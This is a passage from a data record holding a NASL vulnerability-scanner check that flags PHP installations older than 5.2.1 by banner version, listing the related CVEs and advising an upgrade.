PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110175\");\n script_version(\"$Revision: 10460 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2006-6383\", \"CVE-2007-0905\", \"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\",\n \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1376\", \"CVE-2007-1380\",\n \"CVE-2007-1383\", \"CVE-2007-1452\", \"CVE-2007-1453\", \"CVE-2007-1454\", \"CVE-2007-1700\",\n \"CVE-2007-1701\", \"CVE-2007-1824\", \"CVE-2007-1825\", \"CVE-2007-1835\", \"CVE-2007-1884\",\n \"CVE-2007-1885\", \"CVE-2007-1886\", \"CVE-2007-1887\", \"CVE-2007-1889\", \"CVE-2007-1890\",\n \"CVE-2007-4441\", \"CVE-2007-4586\");\n script_bugtraq_id(21508, 22496, 22805, 22806, 22862, 22922, 23119, 23120, 23219, 23233, 23234,\n 23235, 23236, 23237, 23238);\n script_name(\"PHP Version < 5.2.1 Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_tag(name:\"solution\", value:\"Update PHP to version 5.2.1 or later.\");\n\n script_tag(name:\"summary\", value:\"PHP version smaller than 5.2.1 suffers from multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"5.2.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.2.1\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
